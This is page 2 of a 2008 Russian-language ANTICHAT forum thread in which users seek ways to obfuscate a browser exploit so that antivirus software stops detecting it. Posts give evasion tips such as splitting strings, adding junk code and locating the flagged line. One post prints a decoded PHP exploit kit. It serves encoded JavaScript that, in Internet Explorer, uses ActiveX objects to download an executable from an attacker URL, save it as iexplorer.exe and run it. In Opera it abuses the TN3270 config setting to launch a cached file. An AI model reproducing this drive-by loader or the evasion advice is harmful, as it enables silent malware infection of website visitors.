HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Защита ОС: вирусы, антивирусы, файрволы.
Перезагрузить страницу Крипт Сплойта
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.03.2008, 21:32
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
eval($eval_php_code); -> echo $eval_php_code;
 
Ответить с цитированием

  #12  
Старый 15.03.2008, 22:05
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию
А теперь вопрос , как закриптить ...
Желательно по пунктам , самый примитивный метод ... Заранее спасибо
 
Ответить с цитированием

  #13  
Старый 15.03.2008, 23:23
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
самый примитивный - переписать строки из вида "srt" в вид "s"+"tr".
 
Ответить с цитированием

  #14  
Старый 16.03.2008, 01:46
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию
А поподробнее =)
С примерами
Спасибо
 
Ответить с цитированием

  #15  
Старый 16.03.2008, 02:32
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
try { eval('result = CLSID.CreateObject(name)') } в
try { eval('res'+'ult'+' = CLS'+'ID.C'+'reate'+'Object'+'(na'+'me)') }
 
Ответить с цитированием

  #16  
Старый 16.03.2008, 03:13
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию
просто попробуй узнать сначала на какую строчку ругается антивирус, потом пробуй ее изменить
 
Ответить с цитированием

  #17  
Старый 19.03.2008, 03:14
КучО
Новичок
Регистрация: 27.09.2007
Сообщений: 25
Провел на форуме:
209084

Репутация: 25
По умолчанию
код, который выложил тс, пхп
а вы предлагаете на iframe.in его закриптовать как javasript
ну ппц
а по поводу сабжа
я этот же код (как я понял, это от айспака) пытался руками как только не закриптить
тестил с касперским
итог - после минуты работы (добавления мусора и переделывания пары кусков кода) при файловой проверке он перестал орать на него
если же открыть его как html в браузере (что обычно и происходит при целевом использовании , он начинает орать. говорит, что trojan.downloaser.slice.js. Это же он кричал и при проверке файла. Только если при проверке самого файла окошко каспера было красное, то сейчас оно было желтое. Т.е. авер проверяет непосредственно код в памяти, и там он все равно палится
Как же спрятать его?
 
Ответить с цитированием

  #18  
Старый 20.03.2008, 02:14
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию
Купил готовую связку , но все же вопрос актуален .
Как же все таки можно закриптить ?
 
Ответить с цитированием

  #19  
Старый 20.03.2008, 02:47
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию
По поводу первого сплойта - можно удаляя по одной строчке найти ту, на которую ругается антивирус и пробовать изменять её, куски яваскрипта без пхп можно обфусцировать на iframe.in
Однако у меня этот сплойт вообще не выполняется, ПХП выдает кучу ошибок неопределенных переменных, видимо он не полностью представлен, а переменные var[] определяются в том месте, куда инклюдится этот сплоит.

По поводу второго сплойта раскодировать его просто: вместо
PHP код:
eval($eval_php_code); 
вписать
PHP код:
$f=@fopen("sploit-decoded.txt","w");
fwrite($f$eval_php_code);
fclose($f); 
В результате в файле sploit-decoded.txt имеем раскодированый сплоит:

PHP код:

#$url = "http_//"#$_SERVER["HTTP_HOST"]str_replace ("\\", "/", dirname (#$_SERVER["PHP_SELF"]))"/loadphp"%
function encode (#$content) {
    #$str = trim (strip_tags (#$content))%
    #$new = ""%
    for (#$i = 0% #$i < strlen (#$str)% #$i ++) #$new = chr (ord (#$str[#$i]) ^ 1)%
    return <script language=JavaScript>str = "#$new"%str2 = ""%for (i = 0% i < strlength% i ++) { str2 = str2 + StringfromCharCode (strcharCodeAt (i) ^ 1)% }% eval (str2)%</script>%
}
if (#$java == true) echo <applet archive="javaphp" code="BaaaaBaaclass" width=1  height=1><param name="url" value="#$url"></applet>%
elseif (#$browser == "MSIE") echo <html><head><meta HTTP-EQUIV="REFRESH" content="3% URL=indexphp?404">encode (<script language="JavaScript">
start()%
function start() {
var newg = documentcreateElement(\object\)%
newgsetAttribute(\id\,\newg\)%
newgsetAttribute(\classid\,\cl\+\si\+"d_BD"+"96C5"+\56-65A3-1\+"1D0-98"+\3A-00\+"C04"+\FC2\+"9E"+\36\)%
try {
var q = newgCreateObject(\ms\+"xm"+\l2\+""+\XM\+"LH"+\T\+\TP\,\\)%
var s = newgCreateObject("Shel"+"lAp"+"pl"+"icati"+"on",\\)%
var t = newgCreateObject(\ad\+\od\+"b"+\st\+"re"+\am\,\\)%
try { ttype = 1%
qopen(\G\+"E"+\T\,\#$url\,false)%
qsend()% topen()%
tWrite(qresponseBody)%
var name = \////iexplorerexe\%
tSaveToFile(name,2)%
tClose()%
} catch(e) {}
try { sshellexecute(name)% } catch(e) {}}
catch(e){}}
</script>)"</head></html>"%
elseif (#$browser == "Opera") echo encode (<script language="JavaScript">
blank_iframe = documentcreateElement(\iframe\)%
blank_iframesrc = \about_blank\%
blank_iframesetAttribute(\id\, \blank_iframe_window\)%
blank_iframesetAttribute(\style\, \display_none\)%
documentappendChild(blank_iframe)%
blank_iframe_windoweval ("config_iframe = documentcreateElement(\iframe\)%\
config_iframesetAttribute(\id\, \config_iframe_window\)%\
config_iframesrc = \opera_config\%\
documentappendChild(config_iframe)%\
app_iframe = documentcreateElement(\script\)%\
cache_iframe = documentcreateElement(\iframe\)%\
app_iframesrc = \<?php echo #$url% ?>\%\
app_iframeonload = function ()\
{\
cache_iframesrc = \opera_cache\%\
cache_iframeonload = function ()\
{\
cache = cache_iframecontentDocumentchildNodes[0]innerHTMLtoUpperCase()%\
var re = new RegExp(\(OPR\\\\w{5}EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"\+app_iframesrctoUpperCase(), \\)%\
filename = cachematch(re)%\
config_iframe_windoweval\
(\"\
operasetPreference(\Network\,\TN3270 App\,operagetPreference(\User Prefs\,\Cache Directory4\)+parentfilename[1])%\
app_link = documentcreateElement(\a\)%\
app_linksetAttribute(\href\, \tn3270_//nothing\)%\
app_linkclick()%\
setTimeout(function () {operasetPreference(\Network\,\TN3270 App\,\telnetexe\)},1000)%\
\")%\
}%\
documentappendChild(cache_iframe)%\
}%\
documentappendChild(app_iframe)%")%
</script>)%
 
Ответить с цитированием

  #20  
Старый 25.03.2008, 23:45
499392599
Новичок
Регистрация: 12.03.2008
Сообщений: 15
Провел на форуме:
15109

Репутация: 5
По умолчанию
Стукни мне я все раскажу и покажу.
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
с кем можно пообщатся насчет сплойта который тянет соль? Danya Уязвимости CMS / форумов 8 22.12.2005 06:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ